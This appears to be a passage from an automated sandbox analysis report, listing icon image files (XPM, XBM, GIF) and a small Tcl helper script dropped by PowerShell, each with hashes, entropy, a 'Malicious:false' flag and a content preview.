                                                                                                                                                                                                              SHA-256:6A848C63BC2E49EBE2CFF0518879A24C680F0322D672E0B171A709AF317D3EB2
                                                                                                                                                                                                              SHA-512:54AB6E0A374DEF4F8A8B8DE33494BCB12A8FB1D2D8125217ACE0091636C4BF0B52E5667F1E017FC060CB4F896B042AEB3D3798241F7DFC4651174781E99597F5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * minusarm_xpm[] = {.."9 9 3 1",.." .c black",.."..c yellow",.."X.c #808080808080",.." ",.." ....... ",.." ....... ",.." .XXXXX. ",.." .X X. ",.." .XXXXX. ",.." ....... ",.." ....... ",.." "};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):263
                                                                                                                                                                                                              Entropy (8bit):5.109950210426974
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:nWpdWmW6Ik2oKJeYGg7vWQkjQaI19kIKDEXlwbMNO/f3CEPMOMIWFiSP8fIvMv:nW/Wm3+Z9GqvW/81KIKDMI3n7MyJwUv
                                                                                                                                                                                                              MD5:EB67E333D770C357EA88778A03E897DD
                                                                                                                                                                                                              SHA1:AF613D07ABFF9E71E41D22F821932B4D6FD517D0
                                                                                                                                                                                                              SHA-256:E32DB60B06F6C696668E9922C3F4494E6AE5E5987E0F7BF54E43D7DDEEF92DFB
                                                                                                                                                                                                              SHA-512:9450A918EEC52DC2C88941C1B27DD0D34CBB8EEE9AAAE0E1A4C6BD2913976FD24ABB43D0815F7D14188F1A4B684B3F22A7AC02D42E6D9413787E3B785C48C6D8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..#.$Id: mktransgif.tcl,v 1.1.1.1 2000/05/17 11:08:46 idiscovery Exp $..#..#!/usr/local/bin/tclsh....set dont(plusarm.gif) 1..set dont(minusarm.gif) 1....foreach file [glob *.gif] {.. if ![info exists dont($file)] {...puts "giftool -1 -B $file".. }..}....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (32x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):907
                                                                                                                                                                                                              Entropy (8bit):3.385160411953277
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:HeJAh6sr4BkL4nBWSrT2wwiLbL48mMS3pPtTIpkK:vFMTEwXyNSr
                                                                                                                                                                                                              MD5:9B95127F84126300C56FD6A0C03583B1
                                                                                                                                                                                                              SHA1:DD64D1CF4A1A53FE66737F9EFADFB4DEFBD60640
                                                                                                                                                                                                              SHA-256:CD590DA62995AEE324D238ECFC8A018932CFB47F3B409C54C8EE141419C9993C
                                                                                                                                                                                                              SHA-512:2625208B5149CF236438720E0011920142AE5DA4316BEE0D62D591BC44404A8268BD53E2E5D6A2945D15262556B1F04B9C18295C7E05E5C383C259D1A285834A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define network_width 32..#define network_height 32..static unsigned char network_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfe, 0x7f, 0x00, 0x00, 0x02, 0x40,.. 0x00, 0x00, 0xfa, 0x5f, 0x00, 0x00, 0x0a, 0x50, 0x00, 0x00, 0x0a, 0x52,.. 0x00, 0x00, 0x0a, 0x52, 0x00, 0x00, 0x8a, 0x51, 0x00, 0x00, 0x0a, 0x50,.. 0x00, 0x00, 0x4a, 0x50, 0x00, 0x00, 0x0a, 0x50, 0x00, 0x00, 0x0a, 0x50,.. 0x00, 0x00, 0xfa, 0x5f, 0x00, 0x00, 0x02, 0x40, 0xfe, 0x7f, 0x52, 0x55,.. 0x02, 0x40, 0xaa, 0x6a, 0xfa, 0x5f, 0xfe, 0x7f, 0x0a, 0x50, 0xfe, 0x7f,.. 0x0a, 0x52, 0x80, 0x00, 0x0a, 0x52, 0x80, 0x00, 0x8a, 0x51, 0x80, 0x00,.. 0x0a, 0x50, 0x80, 0x00, 0x4a, 0x50, 0x80, 0x00, 0x0a, 0x50, 0xe0, 0x03,.. 0x0a, 0x50, 0x20, 0x02, 0xfa, 0xdf, 0x3f, 0x03, 0x02, 0x40, 0xa0, 0x02,.. 0x52, 0x55, 0xe0, 0x03, 0xaa, 0x6a, 0x00, 0x00, 0xfe, 0x7f, 0x00, 0x00,.. 0xfe, 0x7f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                                                              Entropy (8bit):6.452460532905572
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:CsligtxlXlG8dEU7KC7hTHyknXwwxagHMULTEV8q0Rp7mWRS3GtxFAmhsJloW:Nlw8dt7hTHyWgmHrM6+3GDt6roW
                                                                                                                                                                                                              MD5:F3489C18D9A2DE4A86BC2A10C70572C5
                                                                                                                                                                                                              SHA1:52A2330CC05CA0FECB31DDDA3DB2748EB680B124
                                                                                                                                                                                                              SHA-256:5ACB672D97F4ADF4AE8D31B3968A1A17DFA66C35D74A1DA262F14C12615D3F56
                                                                                                                                                                                                              SHA-512:067FB84BDE0731BBBDBC616FE49572D5082C6ABF3E2F09B5D0CA46EE1C872E485F6A37C9A2729F15C02E772355DEB4C71DB13A23CD9742E47747A398BC0AB756
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:GIF89a . ............@...!.......,.... . ..........a......(...\.&6..^......6m.6K.;...L/..2...T...j......jW"....R....+...i.=U..mW...... ...w.#....XH.(......3T....0.p.Q..;
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1313
                                                                                                                                                                                                              Entropy (8bit):2.8722237105768254
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:UGXu57dVDffYEmFYGN4iAAgQguJ22oCRKbh+RKbh+RKbh+RKbh+RKbh+RKbh+Cen:UGeJX7V9iJ22Ubtbtbtbtbtbi227Ff
                                                                                                                                                                                                              MD5:26A1100FFDECFD44206295FC2C98CEED
                                                                                                                                                                                                              SHA1:24733038C628EB765770BB3A6A6F8561791E3641
                                                                                                                                                                                                              SHA-256:FBC7CF43867AA7CD42AB3B5EE444787AAC11000BDD56EA1C612F287706E75201
                                                                                                                                                                                                              SHA-512:CD22E0A5A88485AF44501D0941A515D1365076B285B5E83240D9DAD8B4B7F22C5EA6BF2A6112A41C068258F91DE92D3AF2DE742E44E1D026711F6C8C7EDBACE6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * no_entry_xpm[] = {.."32 32 4 1",.." .s None.c None",.."..c #000000000000",.."X.c red",.."o.c yellow",.." ",.." ......... ",.." ...XXXXXXXXX... ",.." .XXXXXXXXXXXXXXX. ",.." ..XXXXXXXXXXXXXXXXX.. ",.." .XXXXXXXXXXXXXXXXXXXXX. ",.." .XXXXXXXXXXXXXXXXXXXXXXX. ",.." .XXXXXXXXXXXXXXXXXXXXXXX. ",.." .XXXXXXXXXXXXXXXXXXXXXXXXX. ",.." .XXXXXXXXXXXXXXXXXXXXXXXXXXX. ",.." .XXXXXXXXXXXXXXXXXXXXXXXXXXX. ",.." .XXXXXXXXXXXXXXXXXXXXXXXXXXX. ",..".XXXXXXXXXXXXXXXXXXXXXXXXXXXXX. ",..".XXX.......................XXX. ",..".XXX.ooooooooooooooooooooo.XXX. ",..".XXX.ooooooooooooooooooooo.XXX. ",..".XXX.ooooooooooooooooooooo.XXX. ",..".XXX.ooooooooooooooooooooo.XXX. ",..".XXX.ooooooooooooooooooooo.XXX. ",..".XXX.ooooooooooooooooooooo.XXX. ",..".XXX.......................XXX. ",.." .XXXXXXXXXXXXXXXXXXXXXXXXXXX. ",.." .XXXXXXXXXXXXXXXXXXXXXXXXXXX. ",.." .XXXXXXXXXXXXXXXXXX
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (16x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):226
                                                                                                                                                                                                              Entropy (8bit):4.449775707349144
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeAwqY6orM0wqYKVl9/dUDfHmE2ySswdXgvgL1dVwOCG:HePqY6acqYMli2yS5XgoDP
                                                                                                                                                                                                              MD5:6E48859057770FF10F51D72417F82977
                                                                                                                                                                                                              SHA1:D2C9018D6BEEAC79451328020C94EC2AA60981BD
                                                                                                                                                                                                              SHA-256:997E09F07F38DB012FAEB93FF9A2ECB797DA126A033EE70BB4E53B40068AC887
                                                                                                                                                                                                              SHA-512:DC2506DD3ADB7195290826A0220438A1E22398E571F373179CBD8EFE177946CF1A9587462A926D8225DE73737F9A4BDA94ED131492EC2CCCEB71D9C55D30842C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define openfile_width 16..#define openfile_height 10..static unsigned char openfile_bits[] = {.. 0xf8, 0x01, 0x04, 0x06, 0x02, 0x08, 0x02, 0x10, 0xe2, 0xff, 0x52, 0x55,.. 0xaa, 0x2a, 0x56, 0x15, 0xaa, 0x0a, 0xfe, 0x07};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 16 x 12
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):84
                                                                                                                                                                                                              Entropy (8bit):5.024908100014665
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Cw6NlhCEchkltxlDnAxuJx+umMzgrE:R6N0nxYx+AgY
                                                                                                                                                                                                              MD5:540B5E792E4A09B6AF2A4362FB2B78FB
                                                                                                                                                                                                              SHA1:26268A6C8DE95B4BF0D5A97F02E74BA34ACC5C08
                                                                                                                                                                                                              SHA-256:B1A7E8A341A1F795F0890116F68368FF4BB0F1E0CE73691719DC24E3927463AD
                                                                                                                                                                                                              SHA-512:A9DD50A06AB714AC6940E9ECF6D7E61C85FC5F81607ABD878AADC38063F09936FBCF1304052029BD67A9BEAC6C940F8FEF9E7621C277C8BFD67296F180A288A6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:GIF89a...................!.......,..........%..a.'/T[.B....Q..=.8...T.+..DrK..;
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (16x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):226
                                                                                                                                                                                                              Entropy (8bit):4.425034841133729
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeAwqUorM0wqtqVl9/LfHxhEhfFz+dRUHKU88hr:HePqUacqeVhELit8d
                                                                                                                                                                                                              MD5:166FA811CCA199D1F256C79F7E61C61B
                                                                                                                                                                                                              SHA1:B7FD9F11773A95BF1151BCE6C3AE6E15B57B9004
                                                                                                                                                                                                              SHA-256:93C13E84F98D290EF701259404220C081BDD319C03614A13CFF23118DBDD08D8
                                                                                                                                                                                                              SHA-512:14AFEE9BDE4E5A443197BD0E6998441D5E865E1BF3AC630275081A12E35F6E75F31751D6063A32609091F179D812956CA53B3A1E9B438A6AD92CF2FCBB36C862
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define openfold_width 16..#define openfold_height 10..static unsigned char openfold_bits[] = {.. 0xfc, 0x00, 0x02, 0x07, 0x01, 0x08, 0xc1, 0xff, 0x21, 0x80, 0x11, 0x40,.. 0x09, 0x20, 0x05, 0x10, 0x03, 0x08, 0xff, 0x07};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):439
                                                                                                                                                                                                              Entropy (8bit):4.138707934064281
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:UGXffmfjLLSKsADKNGfvEmFHeU9sF582QwaiiVV:UGP+bLLOILfcweksF582TCV
                                                                                                                                                                                                              MD5:43364B9C7DE8AC797765FBBD46ECE29D
                                                                                                                                                                                                              SHA1:5045116F582A8856995E5897D0C9E3FDE29B2FA4
                                                                                                                                                                                                              SHA-256:917EE346574FA9F63B0A407AF52D44FB2A1645F870047599816D944C76105F47
                                                                                                                                                                                                              SHA-512:E1178082F01E1E86BA50BB96343076A729AC5816467A91CC296350D9D129CA98FF355AED43A92F9A81081983579C92F1DE60D8EA4B988211A7EBBC5DA44DEBD9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * openfolder_xpm[] = {../* width height num_colors chars_per_pixel */.."16 12 3 1",../* colors */.." .s None.c None",.."..c black",.."X.c #f0ff80",../* pixels */.." .... ",.." .XXXX. ",.." .XXXXXX. ",.."............. ",..".XXXXXXXXXXX. ",..".XXX............",..".XX.XXXXXXXXXXX.",..".XX.XXXXXXXXXX. ",..".X.XXXXXXXXXXX. ",..".X.XXXXXXXXXXX. ",.."..XXXXXXXXXX.. ",.."............. "};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 9 x 9
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):58
                                                                                                                                                                                                              Entropy (8bit):4.160764410683656
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:CMlbGltxlweemen:/luep
                                                                                                                                                                                                              MD5:ADDEB98686E49E94A69CAB92D54AABD6
                                                                                                                                                                                                              SHA1:77A65D4E16B56C6B782D2950405ADA07D09C6862
                                                                                                                                                                                                              SHA-256:16EA40FED8C12BBF64B072BACF6B1C8CA80CE26E08FEE7860B98CC9CCE44FA64
                                                                                                                                                                                                              SHA-512:DB01C4ED7153D90CDF9CFC9CDEE44C2C386150B920B18AA6DA8C61D5B86BB9B254A225D78CC319C417F0FC3A6576D02FDB627F81C540C3167A34948013537BF3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:GIF89a.............!.......,.................."Ks.,.S..;
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (9x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):200
                                                                                                                                                                                                              Entropy (8bit):4.240847642599925
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeADd0zN94xfHMwwddVAddVA42ddVsAdVAwwh:He60TrAsPa
                                                                                                                                                                                                              MD5:157EAB192EA187E2604D7745D25ECD85
                                                                                                                                                                                                              SHA1:6C432F86B4A440FCFD5524276807B2D171EB1D52
                                                                                                                                                                                                              SHA-256:38AABBDDD20CE0F3CEC8A4FAE12076D3A6AF6B66ADBBE631B243DF7C1905D372
                                                                                                                                                                                                              SHA-512:3639AEDED9D1A53FAEF507BC71F06886702068B89D37FF6F6FAB4A26FB54A0635CFDBB09826DE664A62BFC96C62D5FFCCF880329646A9B330E4E89C51A250BE9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define plus_width 9..#define plus_height 9..static unsigned char plus_bits[] = {.. 0xff, 0x01, 0x01, 0x01, 0x11, 0x01, 0x11, 0x01, 0x7d, 0x01, 0x11, 0x01,.. 0x11, 0x01, 0x01, 0x01, 0xff, 0x01};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):214
                                                                                                                                                                                                              Entropy (8bit):3.811736180063668
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:UGCinNx2iHmeytUp6/crAJUNFFCvoVZLroVZLrobNF4ZLroVZLroVvo1FFI3v:UGX7Hmfm4UrsUNqwVeVeboeVeVw1wf
                                                                                                                                                                                                              MD5:A17C838C9FC3DDA447442DAED8DDC542
                                                                                                                                                                                                              SHA1:CE1E2AFC73F13C5C74B492319CEFF0CC0495C347
                                                                                                                                                                                                              SHA-256:F8A13E2DC9D1E2D64FC97A1459355035275EAEF5246041ECE0AA6433727FA213
                                                                                                                                                                                                              SHA-512:EB984C784FFB602C1745CB6AD72DC3D9FBF2B50BD83581CF46E19B36230DADAC3CF0755264E5CEF49569C12ED593C565E60F46C84A503E106BD54A10002859E9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * plus_xpm[] = {.."9 9 2 1",.."..s None.c None",.." .c black",.." ",.." ....... ",.." ... ... ",.." ... ... ",.." . . ",.." ... ... ",.." ... ... ",.." ....... ",.." "};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:GIF image data, version 87a, 9 x 9
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                              Entropy (8bit):4.295046883018049
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Mfsl0HTjl/I+ZPlNm9gE:dyW0Pla
                                                                                                                                                                                                              MD5:8FF1CEBD68CF66BCFBFD9079ACB500C2
                                                                                                                                                                                                              SHA1:AAFB265EA8DA893BE4FE87F520194A0ACE9B2FBC
                                                                                                                                                                                                              SHA-256:6FC4098826CA6E02ED0BE4060014861E494913E6684ABEC63B022D60C1C73011
                                                                                                                                                                                                              SHA-512:7EE99EF1E66ED395154D433F4E7946A81C3235A8F7A57C33390939739B73752CB32A0996F370CECCF80C0C72212AA5C493A9138875E62E82CBBCECF3219C47C9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:GIF87a.............lhh...,.................`.@(g(t.^.DL. ..;
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (9x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):209
                                                                                                                                                                                                              Entropy (8bit):4.396398399066981
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:HDKAvMfNQ0vMyDZcFKJMIgeW+DGfHBv32wwhwhwwwhdxHwwwZ3ey:HeAB0RDH9ofHMwwKKww2wwh
                                                                                                                                                                                                              MD5:F48472ADB11C92AAA18DBB92DBFC7F32
                                                                                                                                                                                                              SHA1:6560EBDED9501526A71F01355A8A61D30683FB5F
                                                                                                                                                                                                              SHA-256:D203E21013532585774695FA825CC5E9FDD61CBB6D003D5A81EA5708F632943D
                                                                                                                                                                                                              SHA-512:89789184B1C1019EF2BAEEF67B09772AC220F5356E4D19F0A74E4601A8E1300D7DF0D37AE4EDEFF7B8AC783558C17F871F603158A949D10C6942668F06E76BD2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define plusarm_width 9..#define plusarm_height 9..static unsigned char plusarm_bits[] = {.. 0xff, 0x01, 0x01, 0x01, 0x6d, 0x01, 0x6d, 0x01, 0x01, 0x01, 0x6d, 0x01,.. 0x6d, 0x01, 0x01, 0x01, 0xff, 0x01};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):227
                                                                                                                                                                                                              Entropy (8bit):3.9984120880251264
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:UGCinNx+3DfeyRov9AJURcoIvH9sSt/FFCvoVZLroV9FfpulDS9FfpgZLroVvo1+:UGXqffOv9sUR+9si/qwVeVUwaeVw1wf
                                                                                                                                                                                                              MD5:ED212B4C148EFA5E2D74BF369155D0C3
                                                                                                                                                                                                              SHA1:28E9856DD1A8B178A88FF2975ECD8E61B234B97A
                                                                                                                                                                                                              SHA-256:29028826C570486B84309EAC36A44FF4EC075F4BC6524FCF670BB15A6AC2D9D3
                                                                                                                                                                                                              SHA-512:F70571F25AD6446751934491FB3B6AA9EAA4872B8E38BC54E048D8003AE85BC65C7472BC542585DFFFC37BDB59AAF1985A2923BE95417EE9465CA47EFB293E2C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * plusarm_xpm[] = {.."9 9 3 1",.." .c black",.."..c yellow",.."X.c gray40",.." ",.." ....... ",.." ... ... ",.." ..X X.. ",.." . X . ",.." ..X X.. ",.." ... ... ",.." ....... ",.." "};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (13x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):313
                                                                                                                                                                                                              Entropy (8bit):4.325607120383209
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeAd0YH0rYM0Z9qufHQvwrdV3FlS4dT6SkHdV5ddXkVPey:HeLYLwvwJtTTk9Fyky
                                                                                                                                                                                                              MD5:5CEB953BDE68879776979228FF6EC32E
                                                                                                                                                                                                              SHA1:B73FD488BE7912FD0C008D470101EF4E92E6DF75
                                                                                                                                                                                                              SHA-256:E922248C4442F0DC2649395FA3DAF6E632FE2535C80F0B08CF3E437DA90C6A40
                                                                                                                                                                                                              SHA-512:07FA6C0C1C06AC9600B0A09C99AF9B58D9776D7B74AF7AC73FB2FD69DDA22275A81027FD4866A64064BCBA25191B2D2669D9778DCD148820E0D5793D0100055E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define resize1_width 13..#define resize1_height 13..#define resize1_x_hot 6..#define resize1_y_hot 6..static unsigned char resize1_bits[] = {.. 0x7f, 0x00, 0x21, 0x00, 0x11, 0x00, 0x31, 0x00, 0x6d, 0x00, 0xdb, 0x00,.. 0xb1, 0x11, 0x60, 0x1b, 0xc0, 0x16, 0x80, 0x11, 0x00, 0x11, 0x80, 0x10,.. 0xc0, 0x1f};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (13x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):313
                                                                                                                                                                                                              Entropy (8bit):4.367494827426141
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeAFyV0F3JH0FdYCM0FW59q/9fHEVCsvdd5dCSeIFgdBLFl5dVKswvgf:Hebvn2pUsF9CSbG5gTvu
                                                                                                                                                                                                              MD5:D1FE6C15261F170C4793D62E0CD00A75
                                                                                                                                                                                                              SHA1:7AA405BC31808D114A19FAF6BBCFF16838C2AC99
                                                                                                                                                                                                              SHA-256:DA1A4E91A087F0BA61AC8A6041E196CDCD83E4BF439BA40D184E35017961B70B
                                                                                                                                                                                                              SHA-512:EF33B8EA78EAC995C1B332AED8263B7E25B14EFA24D68B584E4B8A638BEF076406AAD8BA5FD47E63C11D52CE23DA7158DDDA75C575C114537FEF3D0AC159A0FF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define resize2_width 13..#define resize2_height 13..#define resize2_x_hot 6..#define resize2_y_hot 6..static unsigned char resize2_bits[] = {.. 0xc0, 0x1f, 0x80, 0x10, 0x00, 0x11, 0x80, 0x11, 0xc0, 0x16, 0x60, 0x1b,.. 0xb1, 0x11, 0xdb, 0x00, 0x6d, 0x00, 0x31, 0x00, 0x11, 0x00, 0x21, 0x00,.. 0x7f, 0x00};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (15x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):287
                                                                                                                                                                                                              Entropy (8bit):4.000914365149537
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeAymM02Y09qtDfHZhWLM3Whi5LXLChqMmcVChmf:HexYeml3Whi5LXLChhmcZ
                                                                                                                                                                                                              MD5:5B140C3466898515AFCF6E3AD671AEC3
                                                                                                                                                                                                              SHA1:E2571288A454E39AF3C557B4F276EE4E4333958C
                                                                                                                                                                                                              SHA-256:EF817004DA4F01A79B2B7D938D9958B86BC20B3CE25D19ED67D4A73373781AD6
                                                                                                                                                                                                              SHA-512:029FCA049BFEAB21256742790CA6040B3131CDB31F5858E6EC03C6703B03A611C3408FB46776BD3DED84CE86961722C1CD7873EE3490B4F2845E58DA03C810AB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define restore_width 15..#define restore_height 15..static unsigned char restore_bits[] = {.. 0x00, 0x00, 0x80, 0x00, 0xc0, 0x01, 0xe0, 0x03, 0xf0, 0x07, 0xf8, 0x0f,.. 0xfc, 0x1f, 0x00, 0x00, 0xfc, 0x1f, 0xf8, 0x0f, 0xf0, 0x07, 0xe0, 0x03,.. 0xc0, 0x01, 0x80, 0x00, 0x00, 0x00};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 12 x 12
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):79
                                                                                                                                                                                                              Entropy (8bit):4.840270993565107
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Ckkaaa/dNlMcyltxljpWer17kyR0dEn:Hd/d8bViu0dEn
                                                                                                                                                                                                              MD5:483493CACB6AF1A40C9250A85B53CF76
                                                                                                                                                                                                              SHA1:48F9428BD056E4F2EB286937A8FA812FE39385B6
                                                                                                                                                                                                              SHA-256:36CB7CCA5A262C77937B45B9ED3EAC3CACC85181C133C45913FAC7481221197D
                                                                                                                                                                                                              SHA-512:7D3FA1B9B66D6252A713CBD1EC7E0B4B17664A37F5E9085A54A3FAF75C0A57F6A94E08F2ECF7F32F741026B5D6CF2120C1E317F29AA58CD35FC7B24E97D931CD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:GIF89a...................!.......,.......... D..k..X{..@i..^.U..jd..b...n....;
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (12x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):247
                                                                                                                                                                                                              Entropy (8bit):4.251199088221871
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeAslOPoeB70slOFVl9jMtDfHOEhihkhmKwHoggAGhCG:HeTyncJu5hmKpAGV
                                                                                                                                                                                                              MD5:97F3D0B277525DD3D80FC7650AD7F5E4
                                                                                                                                                                                                              SHA1:93F2B9C4B10430F9529F8D0FFF4899A0E60AE3DB
                                                                                                                                                                                                              SHA-256:369B3AB49934FC1042A6334C1582F98F5571E8DD946B371AB9EB62124608043A
                                                                                                                                                                                                              SHA-512:5FAA48A4FFCA88A40041957E79DAF84386D54B4E64AA45372E72C26FDC527D6327A34F9D04D553BA1B448DC960A794C43333004D9744542AFF8EBD6506D8878A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define srcfile_width 12..#define srcfile_height 12..static unsigned char srcfile_bits[] = {.. 0xfe, 0x01, 0x02, 0x01, 0x02, 0x07, 0x02, 0x04, 0x72, 0x04, 0x8a, 0x04,.. 0x0a, 0x04, 0x0a, 0x04, 0x8a, 0x04, 0x72, 0x04, 0x02, 0x04, 0xfe, 0x07};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):312
                                                                                                                                                                                                              Entropy (8bit):3.8519699308147968
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:UGCinNV96YGeyURv3LSFHGJU9sgNlp69pFF29pLLFHmJ9f9LFHYBLT4ljfqlVjFZ:UGXFifcv3mFHeU9sgNWwaoaaoaots
                                                                                                                                                                                                              MD5:FE914FF0E6016B3DDD8486477D9ACA5A
                                                                                                                                                                                                              SHA1:816E4E4FA54620D876B76897447C3DB74F987EA4
                                                                                                                                                                                                              SHA-256:3890463645A661C5DE044FAB923CD5E3FFA2A02869BA6F750230DE74DA58EB12
